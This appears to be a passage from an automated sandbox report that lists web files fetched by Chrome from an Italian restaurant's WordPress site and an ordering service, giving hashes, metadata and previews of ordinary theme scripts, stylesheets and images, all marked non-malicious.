                                                                                                                                              SHA-256:6D9644BE924CD574A9AEB38975E5F292544309B2DDB32E3B6E179A045544E12B
                                                                                                                                              SHA-512:9AEEF6B2CB09EC8E5EB51EFBE5B3DD6EFD5DC16BC85940E2DA70BCAF7F79BE14563F871ACFB4248A5EC716F43C1DC7C219189967235AE0889862398E0940B50E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://enginev2.pienissimo.com/v4/ordini/getProfilo/?cod_univoco=47667869&doNotCheckUser=true
                                                                                                                                              Preview:{"lingua":"Italiano","nome_locale":"CIPASSO Roma","telefono":"3282045550","cellulare":"","prefisso":"+ 39","valuta":"eur","country":"IT","location":{"lat":41.9020219,"lng":12.4758908},"pixel_facebook":null,"pixel_google_analytics":null,"pixel_google_tag_manager":null,"pixel_tiktok":null,"durata":"90"}
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (1485), with no line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1485
                                                                                                                                              Entropy (8bit):5.142774489176319
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:ExkffRGjM7LGrYRS7zsQCBm3lBmGa0BTLWwMWiB/azfIvJks8Df:EWRIDY8QQuKTLWnBeYks8L
                                                                                                                                              MD5:1244D3F2F28ECC6619157927ACA95200
                                                                                                                                              SHA1:A9AAFCF49F49145093FC831EFD9B8E2F6C71BB9C
                                                                                                                                              SHA-256:6C5ACBB82A46A4971660F65131241DFFCC28828F4DBD76B8EC7BAB0B468250F8
                                                                                                                                              SHA-512:3686AFB82F76DA09848C154CCB79A5213DC67698763412E526216FBCE17A94BD0B1762DA3627677B3EE97A05CDC837739FDC4DBDC08B13FBD50CBB0FB9A0B512
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/runtime-es2015.66c79b9d36e7169e27b0.js
                                                                                                                                              Preview:!function(e){function r(r){for(var n,l,f=r[0],i=r[1],p=r[2],c=0,s=[];c<f.length;c++)l=f[c],Object.prototype.hasOwnProperty.call(o,l)&&o[l]&&s.push(o[l][0]),o[l]=0;for(n in i)Object.prototype.hasOwnProperty.call(i,n)&&(e[n]=i[n]);for(a&&a(r);s.length;)s.shift()();return u.push.apply(u,p||[]),t()}function t(){for(var e,r=0;r<u.length;r++){for(var t=u[r],n=!0,f=1;f<t.length;f++)0!==o[t[f]]&&(n=!1);n&&(u.splice(r--,1),e=l(l.s=t[0]))}return e}var n={},o={0:0},u=[];function l(r){if(n[r])return n[r].exports;var t=n[r]={i:r,l:!1,exports:{}};return e[r].call(t.exports,t,t.exports,l),t.l=!0,t.exports}l.m=e,l.c=n,l.d=function(e,r,t){l.o(e,r)||Object.defineProperty(e,r,{enumerable:!0,get:t})},l.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},l.t=function(e,r){if(1&r&&(e=l(e)),8&r)return e;if(4&r&&"object"==typeof e&&e&&e.__esModule)return e;var t=Object.create(null);if(l.r(t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):11896
                                                                                                                                              Entropy (8bit):5.048802108316265
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:jng3ULb9+theoDIsxXlLrpump9sA/4qlAVXK0gYRTi:LgvHeo3rpwq+XZTi
                                                                                                                                              MD5:19B9D06C2A8C2FF3C6DF17B9DC237A1F
                                                                                                                                              SHA1:424700D33DC23FA4D2EC4BEA38D63ECFB986AE57
                                                                                                                                              SHA-256:1794CBE30B683A510A088F59EE0CC901769234AB9FFA4C96226620209C6BE5BA
                                                                                                                                              SHA-512:5BF1FF663733BB6785836333522FA6C5F4DDF24DA3EB721216FC767AB6BDB5F89165C91293CDA8D93D72BBA4E0709F9790E8BF5A2ECE1B174FBBEDE28D826341
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow.css?ver=6.0.9
                                                                                                                                              Preview:./* ======================================================================================================================================================.Slideshow.====================================================================================================================================================== */..avia-slideshow{position: relative; margin:50px 0; width:100%; clear: both; overflow: hidden;}..flex_column .avia-slideshow{ margin:20px 0; }..flex_column .avia-slideshow.avia-builder-el-no-sibling{margin-top:0px;}...avia-slideshow-inner{padding:0; margin: 0; position: relative; overflow: hidden; width:100%;}.#top .av-default-height-applied .avia-slideshow-inner{height:0px;}..avia-slideshow li{padding:0; margin: 0; list-style-type: none; list-style-position: outside; position: absolute; visibility: hidden; z-index: 1; top:0; left:0; width:100%; clear:both; opacity: 0; overflow: hidden;}..avia-slideshow li:first-child{position: relative; visibility: visible; z-index: 3;}..a
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):706
                                                                                                                                              Entropy (8bit):4.350290640622491
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:2DbNt0Bk6qCWGHyeJktvjKLZHql2e9GBqHmTXFBTl2XiUMJu/b:2DbNuBk6qCpJ8LKLZ62eaTXFT2/MJu/b
                                                                                                                                              MD5:6DB3D0D2AADAB21A9E90678B672948D4
                                                                                                                                              SHA1:C6661AF97C02277DB3B67111DEC804BA75D69E58
                                                                                                                                              SHA-256:33A4663017547D3173AC7167C868398484FFCD6F609657B085F12E132AA89E55
                                                                                                                                              SHA-512:6655AC453A8A3980F4F584002930259E7FBD5ED92E33A539FD729E304728B60AE63527BC658482A10714F8FA9D5B035D61EF2D4ACFE83DE269A9C6234F6D7D9C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($).{ .."use strict";....// -------------------------------------------------------------------------------------------..// testimonial shortcode javascript..// -------------------------------------------------------------------------------------------....$.fn.avia_sc_testimonial = function(options)..{...return this.each(function()...{....var container = $(this), elements = container.find('.avia-testimonial');........//trigger displaying of thumbnails....container.on('avia_start_animation', function()....{.....elements.each(function(i).....{......var element = $(this);......setTimeout(function(){ element.addClass('avia_start_animation') }, (i * 150));.....});....});...});..}...}(jQuery));
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 2056 x 494, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):97851
                                                                                                                                              Entropy (8bit):7.418342536849731
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:gNDhIrbNufH3QrUzXvDAnd2qJZfk3kcQwxZqXsBwMY9ZbjgAQH7AUUUUUQ:gzIrbwfHmUzDycAskpwxwXswFZbK7AUc
                                                                                                                                              MD5:B44FCDE83AC201F3581D012822B45D97
                                                                                                                                              SHA1:02C9071FBBE144A620072CE75942F23506F520C9
                                                                                                                                              SHA-256:94AAFBBDF656C831AC157DB9D42508A5485FABA8073A611D1AF2C941AA5EDE04
                                                                                                                                              SHA-512:4B3CEE10052785993D5BC3CC20CC8C5A247CE8751DF7962D4C15754EB461642F258D9256F6C5C2C18961285C1447EF18457AEF7537A03C265A9FC7B908969F6D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2019/06/sfondo_cerchi.png
                                                                                                                                              Preview:.PNG........IHDR.....................pHYs.................iCCPPhotoshop ICC profile..x..wT.Y.......-!.RBo....k...FH ...B.......X...eDFD... cA,X..{..AE]..6T....{v..=g.s.9..{........Nr.R1...-..b...I.)l.. .......\.ott8...p.....6\.T..[...sy.H4...sy...1...'....$.0^*......`..S..-...Lr=.0.&............D.re...].`...r..'....E.....x.\>.M........h..`..O>...LSzr..%O......Q.T.].....+..0...P....$..&kI..%i.QS,.O......!.S...O.b>7 l..Y.S.M...9qS,[.....#....%....Nq.(.3....)..%DNqnVl......S.({..)g.....K...Q.....G...#..)}......J=7/VyV..S....i.h.."..<y.29.....r.H ..}.Rq:.#...b;...$%..'......@XW...N....D0.q..N<.`|.........)dy.......P.&h.>.....8...@ .B..A2,...!.d...`..C)l..P......!8.mp...E..}p......K...0. ...#.D.1@L.k..qE..@$..A..TD.H..R..CJ.2...4"."'...e....."#.[....4...f.l...E..8t!*@s.|...V.u.A..=.^Eo...Kt.....0C..s...(,...d.*.....f....n`..+.3..c..8.........rp.p.qU...V.y... n...O.....x.>././...+..............E0'..B..L...F..B....O."...Dm.5..E....b.N.A...u.0...J2 9..H)$.i-..t.t.t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 1051 x 630, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):834032
                                                                                                                                              Entropy (8bit):7.994041545331016
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:12288:7Ht2ldZazO/7FjxHExIDonrXaYEpX/l3J3hcgGS13VTOxExP6FzVkqCJic:7Ht2ldZ+5x6orKvVJxLGuVTOixPgqN
                                                                                                                                              MD5:93A185206C73A36128C4CADB337B0666
                                                                                                                                              SHA1:C19C0B471FD903D0B5433E2079B3D0488F2B508F
                                                                                                                                              SHA-256:05AECB32FCBC40E6F291A94FC3D347A6CDA7161E0DFC633106C47507C8B397BC
                                                                                                                                              SHA-512:6922A942E79E2C7552AF8D894C0D1F9421E280379A8C5BF9260CF29CC748BD44ED0176D540860C8279475B89596B49BFB83489F26286C7C9F2ADDC40BB3B344D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR.......v........z....IDATx....%I.....HV?\.....Q..y0. .U...Y.\..p.... ........?0....?....`n.\.oV...an..g...7...........?....S.V..>. ...|}O..w7..-7.~.n.....q...~7...n...h.dq=...:...;.......8`X.&^S]S}..{......^....za.=k.6..\.&......'..0.7...z..nn..........?.~..X..>.i.N...}X.........qj9..3.+..C.......b../.|.N.i..u.h....S.j.s.....X....47.4....].....b...p....=._^.9..Z..}:;.....x!....iL...bn.psG...z...m....`..n........].3\..~.]|..]....m.[.p].c....D..........p.&]K.+Y]c.u7.wv=.....y.....5.s..w....u...m-.7.Z.c......|.%.{.5....XSb..h.....V^..k....1od....i. ?k.S...^.k8d}4x.]..}..4..r.k.h^.3@..q.....F.>b..Bm....8>,Ck.....aM.?.m./..}.....:_.....5V./.Z.....L..Y._|>^.S.E....c....?...i}..jX?.9.W.w.a|>.....K.i........L.............O......5..]_o.g....n...~....6@..p-r*...A..(..@.....VUQ|..U.6.8[.@.o.r....\@saj......b..M.......Z.h1... ]E.i.."m._.t.49...)...t .h=k~.~...p.9.....h...Y....UY........2..\...A..\?3..}..Y.\.WE.....a.&@..m"[.O;.._2..".+.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2614
                                                                                                                                              Entropy (8bit):4.25236334924111
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:+B9FFoxAiuKFGUOKKqwwSwiPy5L38+OPKBcYDZw/phVH:+gnjuhwO9pX
                                                                                                                                              MD5:D04321D5048164334182443686794A6F
                                                                                                                                              SHA1:CE12CBB4C4FB8F95E5F2DDC828219B90191493F7
                                                                                                                                              SHA-256:124E8E2A19152AB9EF3BF75F89A0128EF5B93ED639C162DDBAF0BBE752803D77
                                                                                                                                              SHA-512:4D0047769528992E0CE36F45CF835E9132C3A83FA6771A8260B30A9FE90F189366CE2DF8000BA027FCDC2A8CA0F90F843C465CF42A5F6830E2B38BCA51D11FA2
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($) {.. "use strict";.. $(document).ready(function() {.. $('.avia_auto_toc').each(function(){.. var $toc_section = $(this).attr('id');. var $levels = 'h1';. var $levelslist = new Array();. var $excludeclass = '';.. var $toc_container = $(this).find('.avia-toc-container');.. if ($toc_container.length){. var $levels_attr = $toc_container.attr('data-level');. var $excludeclass_attr = $toc_container.attr('data-exclude');.. if(typeof $levels_attr !== undefined) {. $levels = $levels_attr;. }. if(typeof $excludeclass_attr !== undefined) {. $excludeclass = $excludeclass_attr;. }. }.. $levelslist = $levels.split(',');.. $('.entry-content-wrapper').find($levels).each( function() {.. var $h_id = $(this).attr('id');. var $t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):849
                                                                                                                                              Entropy (8bit):4.501336493442654
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:2aSUqG+HMVVwVwBFe1D+WGkv+sDeTbmRoeIROMfDzMzvs7/laXfLsbvsWsKm7aXr:2rMVVw2BFe4w5Ksoe5QcDsbueb
                                                                                                                                              MD5:18ED7837CAAADC19C343B8C9BDFD9248
                                                                                                                                              SHA1:5200AAFAA57ED6071899FDC920947AD0A6FAB137
                                                                                                                                              SHA-256:3831E5C07B5FAB004471D91C7654B71924A24B85A05BA271D19A62348A5CF565
                                                                                                                                              SHA-512:763A2A90C169EB086D9E4A313615BF8B0ABA44CC6E33E7D8B2AD3B06BD36C0EA9E4C4A073EA17E8100DDCB656D8C0014D848C3B70E259A17ABAC2F8621A47215
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($).{.."use strict";..// -------------------------------------------------------------------------------------------.// makes sure that the fixed container height is removed once the layerslider is loaded, so it adapts to the screen resolution.// -------------------------------------------------------------------------------------------..$.fn.layer_slider_height_helper = function(options).{..return this.each(function()..{...var container .= $(this),....first_div .= container.find('>div:first'),....timeout .= false,....counter .= 0,....reset_size .= function()....{.....if(first_div.height() > 0 || counter > 5).....{......container.height('auto');.....}.....else.....{......timeout = setTimeout(reset_size, 500);......counter++;.....}....};....if(!first_div.length) return;....timeout = setTimeout(reset_size, 0);..});.}...}(jQuery));
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1920
                                                                                                                                              Entropy (8bit):4.6284279802511925
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:4okR/orGeuvKYaXailaHfxKAOx4jnx9/iAMgbZFMy9mDt/Z9J/bJ/FiS13HFjTYG:4zZ+GeM0wtnHHbrYnx
                                                                                                                                              MD5:7436232E3249F4A931CA655BDF232776
                                                                                                                                              SHA1:1D082675EE9E11676F087C39B3200A0D94D143ED
                                                                                                                                              SHA-256:AE2475180F22803176D5B7642390F1C098C8E4FE0BF1315FB62776A7224C0B6B
                                                                                                                                              SHA-512:4B9ECC23592474E9C50698065AAB6C36974F1C8672BBE576F2E7118112A0073D6D120C04B48F3971304AB9216C68EF35B0278E842D5E098AD8B587AC247B5CBA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/headline_rotator/headline_rotator.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Text Rotator.====================================================================================================================================================== */.#top .av-rotator-container{position: relative; }.#top .av-rotator-container-inner{position: relative; line-height: 1.1em; margin:0; font-weight:300; text-transform:none; color:inherit; font-size: inherit;}.#top p.av-rotator-container .av-rotator-container-inner{line-height: 1.1em;}..av-rotator-text, .av-rotator-text-single{position: relative; display: inline; }....av-rotator-text-single{display: none; top:0; }..av-rotator-text-single:first-child{display: inline-block;}..av-typewriter .av-rotator-text-single:first-child{display: inline;}...#top .av-rotator-container a:hover{text-decoration: underline;}..av-fixed-rotator-width .av-rotator-text{text-align: left; display: in
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (46554)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):46555
                                                                                                                                              Entropy (8bit):5.273836830118638
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:lFPBIqz5d+KWtC5YvqoV0bJjc0i8lODACZwc060V5p:zmqzDt5Yv5Vu5BaLw97R
                                                                                                                                              MD5:CF9D22F3EE084B5B9B3F43ABF602A988
                                                                                                                                              SHA1:5FA33DE95B6EEB69BB70AF2177352CF656388751
                                                                                                                                              SHA-256:684E82D57E0E22CFE1EA891AE71A007654C2EB7E69CCCA318351EE9D0E9CF644
                                                                                                                                              SHA-512:6EECE35ADD3BEBD26B241477F2FFF7FDF57594990096277F7E197ED943FFAEE7A8DDF5696CFB1965C6F404C5CA9123DDE3A086307E7FA93C775F3521D9AFBB1E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=6.6.1
                                                                                                                                              Preview:#sb_instagram {width: 100%;margin: 0 auto;padding: 0;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;}#sb_instagram:after{content: "";display: table;clear: both;}#sb_instagram.sbi_fixed_height{overflow: hidden;overflow-y: auto;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;}#sb_instagram #sbi_images{-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;}#sb_instagram .sbi_header_link {-webkit-box-shadow: none;box-shadow: none;}#sb_instagram .sbi_header_link:hover {border: none;}#sb_instagram #sbi_images .sbi_item{display: inline-block;width: 100%;vertical-align: top;zoom: 1;margin: 0 !important;text-decoration: none;opacity: 1;overflow: hidden;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;-webkit-transition: all 0.5s ease;-moz-transition: all 0.5s ease;-o-transition: all 0.5s ease;transition: all 0.5s ease;}#sb_instagram #sbi_images .sbi_item.sbi_transiti
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2614
                                                                                                                                              Entropy (8bit):4.25236334924111
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:+B9FFoxAiuKFGUOKKqwwSwiPy5L38+OPKBcYDZw/phVH:+gnjuhwO9pX
                                                                                                                                              MD5:D04321D5048164334182443686794A6F
                                                                                                                                              SHA1:CE12CBB4C4FB8F95E5F2DDC828219B90191493F7
                                                                                                                                              SHA-256:124E8E2A19152AB9EF3BF75F89A0128EF5B93ED639C162DDBAF0BBE752803D77
                                                                                                                                              SHA-512:4D0047769528992E0CE36F45CF835E9132C3A83FA6771A8260B30A9FE90F189366CE2DF8000BA027FCDC2A8CA0F90F843C465CF42A5F6830E2B38BCA51D11FA2
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/js/avia-snippet-widget.js?ver=4.5
                                                                                                                                              Preview:(function($) {.. "use strict";.. $(document).ready(function() {.. $('.avia_auto_toc').each(function(){.. var $toc_section = $(this).attr('id');. var $levels = 'h1';. var $levelslist = new Array();. var $excludeclass = '';.. var $toc_container = $(this).find('.avia-toc-container');.. if ($toc_container.length){. var $levels_attr = $toc_container.attr('data-level');. var $excludeclass_attr = $toc_container.attr('data-exclude');.. if(typeof $levels_attr !== undefined) {. $levels = $levels_attr;. }. if(typeof $excludeclass_attr !== undefined) {. $excludeclass = $excludeclass_attr;. }. }.. $levelslist = $levels.split(',');.. $('.entry-content-wrapper').find($levels).each( function() {.. var $h_id = $(this).attr('id');. var $t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):210
                                                                                                                                              Entropy (8bit):4.8816581093705915
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tI9mc4sltj4Jol4gRtNz3Ihg5uRIWchg5uRth50hg2:t4394gfNzYQuqRQufhqP
                                                                                                                                              MD5:78FEB91BFDA2DDCE6BCFDCBAB050995B
                                                                                                                                              SHA1:A1433065FC0E8A3D14458AB872BDF44F8A1040FA
                                                                                                                                              SHA-256:7318C9AAB1FA93D98E06F996F797E8A8D02F31FADE30D0DD9B1EE80EFBC76CB5
                                                                                                                                              SHA-512:07092762D3C8C7FF023B8ABCAD1854674C224ADA18D7FC6E3DAE6B89865907BEB388C19359A6E5CD428CAAD4920A05C8803D7D3056FADFE9047AA1F3E7AAB10D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/de.6435bf24d148ca7248e7.svg
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-de" viewBox="0 0 640 480">. <path fill="#ffce00" d="M0 320h640v160H0z"/>. <path d="M0 0h640v160H0z"/>. <path fill="#d00" d="M0 160h640v160H0z"/>.</svg>.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (65345)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):93397
                                                                                                                                              Entropy (8bit):5.598966964748747
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:j5NOzTV33OArTrzZvcIQs/dHlxz/P1QvzUOxOLpkjsLe6eGm1lRBceiM689MCyVI:j5Y/ZvcIQs/dHlxzX1Qvz7xOLpzLe6eJ
                                                                                                                                              MD5:53F8192C7F9CBCE664860291885FAD0F
                                                                                                                                              SHA1:A125D873E513119A2AF686912120F22345DB818C
                                                                                                                                              SHA-256:D023162640CD0BD0DC531E8C7171B6AC34557A704A1B7ACAC6F86F512539030D
                                                                                                                                              SHA-512:02F5B5932463B19962B02D84D5AAF8F922F75E3317FDEF322247C746627F92B77999178F7AE766948A533B21A10CC1753A42BF7CF81B8BB8D757C16C0DADFB0F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:/*... Magic Zoom Plus v5.3.5 . Copyright 2020 Magic Toolbox. Buy a license: https://www.magictoolbox.com/magiczoomplus/. License agreement: https://www.magictoolbox.com/license/...*/.eval(function(m,a,g,i,c,k){c=function(e){return(e<a?'':c(parseInt(e/a)))+((e=e%a)>35?String.fromCharCode(e+29):e.toString(36))};if(!''.replace(/^/,String)){while(g--){k[c(g)]=i[g]||c(g)}i=[function(e){return k[e]}];c=function(){return'\\w+'};g=1};while(g--){if(i[g]){m=m.replace(new RegExp('\\b'+c(g)+'\\b','g'),i[g])}}return m}('1n.aL=(17(){1a B,q;B=q=(17(){1a W={4I:"je.3.5",eX:0,8F:{},$cp:17(aa){1b(aa.$6J||(aa.$6J=++Q.eX))},9Z:17(aa){1b(Q.8F[aa]||(Q.8F[aa]={}))},$F:17(){},$1k:17(){1b 1k},$1s:17(){1b 1s},fz:"dH-"+1q.4R(1q.6e()*1v cc().eS()),3C:17(aa){1b(2E!=aa)},cS:17(ab,aa){1b(2E!=ab)?ab:aa},aQ:17(aa){1b!!(aa)},1U:17(aa){if(!Q.3C(aa)){1b 1k}if(aa.$59){1b aa.$59}if(!!aa.6Q){if(1==aa.6Q){1b"6I"}if(3==aa.6Q){1b"fb"}}if(aa.1J&&aa.eM){1b"gx"}if(aa.1J&&aa.aR){1b"2h"}if((aa 41 1n.7f||aa 41 1n.bo)&&aa.5x==
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (5652)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):70105
                                                                                                                                              Entropy (8bit):5.0346659128132245
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:7iLcOLAfHjpoM0hvTzWbjd3JSS7hMmGV/z74ybRG0vNpXrRLoZ0NRqovJ+zG0Jco:7iLNLAfH2hvTzWHdkS9GV/z74YJ+9cPw
                                                                                                                                              MD5:F91DA3B6621BE518E3C492F2745595FB
                                                                                                                                              SHA1:DF4EEFB154B5716480512A0D3E53124276E00ECA
                                                                                                                                              SHA-256:6CF4E6314E1FF943BC5184762FE965602680F93993C65AEB39F901D7CDF79194
                                                                                                                                              SHA-512:D84FB037119466837FBC2B3C2642092AE33B9A257A9BB39A1987D6260A81A223D3C30CD59E2D6C9B0CB6AAB33AAE242827771703BD170F83100780D42EB2F1D1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($).{.. "use strict";... $(document).ready(function(). {. . var aviabodyclasses = AviaBrowserDetection('html');....$.avia_utilities = $.avia_utilities || {};...if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) && 'ontouchstart' in document.documentElement). .{. ..$.avia_utilities.isMobile = true;. .}. .else. .{. ..$.avia_utilities.isMobile = false;. .}....//activates the hamburger mobile menu...avia_hamburger_menu();... . //show scroll top but1ton. avia_scroll_top_fade();. . //calculate width of content. aviaCalcContentWidth();. . //creates search tooltip. new $.AviaTooltip({"class": 'avia-search-tooltip',data: 'avia-search-tooltip', event:'click', position:'bottom', scope: "body", attach:'element', within_screen: true});.. //creates relate posts tooltip. new $.AviaTooltip({"class": 'avia-related-tooltip', d
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):11409
                                                                                                                                              Entropy (8bit):4.883982385160355
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:mLvIhQIf7L7qyxhkqOLwU+BMCSdipHbh/sHW2t:d7YwU14CWK
                                                                                                                                              MD5:3C24FA8B7479769FC1CCC5F77BE95B66
                                                                                                                                              SHA1:3DF5C8561476B3EBE2338334D0E0AA14A8EADE82
                                                                                                                                              SHA-256:A3B3A5A471B2D41CF340D47E3BBE21E481FDC3A15D5E838309596877832723A1
                                                                                                                                              SHA-512:6E3AB9D45A6A7A3161B45E62F5633DBA069C6919AD84E4BE15E8153231BEB83C11382911A68826E61A8B21031970D0455FBE70A9C4CF7D413CB05A93DFF1B622
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/portfolio.js?ver=6.0.9
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Avia AJAX Portfolio.// -------------------------------------------------------------------------------------------..(function($).{ .."use strict";..$.avia_utilities = $.avia_utilities || {};......// -------------------------------------------------------------------------------------------..//Portfolio sorting..// -------------------------------------------------------------------------------------------.. $.fn.avia_iso_sort = function(options)..{...return this.each(function()...{....var the_body..= $('body'),.....container..= $(this),.....portfolio_id.= container.data('portfolio-id'),.....parentContainer.= container.parents('.entry-content-wrapper, .avia-fullwidth-portfolio'),.....filter...= parentContainer.find('.sort_width_container[data-portfolio-id="' + portfolio_id + '"]').find('#js_sort_items').css({visibility:"visible", opacity:0}),.....links...= filter.find('a'),.....imgParent.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1848
                                                                                                                                              Entropy (8bit):4.724894714024008
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:2dkKIhW0puBkkamo8oMOOMU3p7yU8GfZgQi5OW3qcP3GdhWQ70C+hW0trhW6cdWs:EkTMBjZdoMkE75iQijN+bt76lfBSJkS
                                                                                                                                              MD5:146901F0A263E01098AB0D0F146E47A5
                                                                                                                                              SHA1:6079F2CB25B97B9F7EE0D73355C3683AC12996F5
                                                                                                                                              SHA-256:E4A796EB71E0DAD51E33142B80AAAF859C496CCCF824E6396BA7653BB75C4E03
                                                                                                                                              SHA-512:94142747B7C433344F3FBAF5B32D51E41902B896D7288166155214DCA17844C9BF2E9FE83DC961785DA4213DD7771C5C51FEC5D96983C892A930B5BBB1049D5E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.js?ver=6.0.9
                                                                                                                                              Preview:(function($).{ .."use strict";.. $(window).on('load', function (e) {...$('.avia-icongrid-flipbox').avia_sc_icongrid();. });....// -------------------------------------------------------------------------------------------..// Icongrid shortcode javascript..// -------------------------------------------------------------------------------------------....$.fn.avia_sc_icongrid = function(options)..{...return this.each(function()...{....var container = $(this),. icongrid_id = '#' + $(this).attr('id'),. methods;.. methods =....{.....buildIconGrid: function () {.. this.setMinHeight($(icongrid_id + ' li article'));. this.createFlipBackground($(icongrid_id + ' li'));.......},......setMinHeight: function (els) {.......if (els.length < 2) return;.......var elsHeights = new Array();......els.css('min-height', '0').each(function (i) {.......var current = $(this);.......var currentHeight = current.outerHeight(true)
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):685
                                                                                                                                              Entropy (8bit):4.353846854825342
                                                                                                                                              Encrypted:false
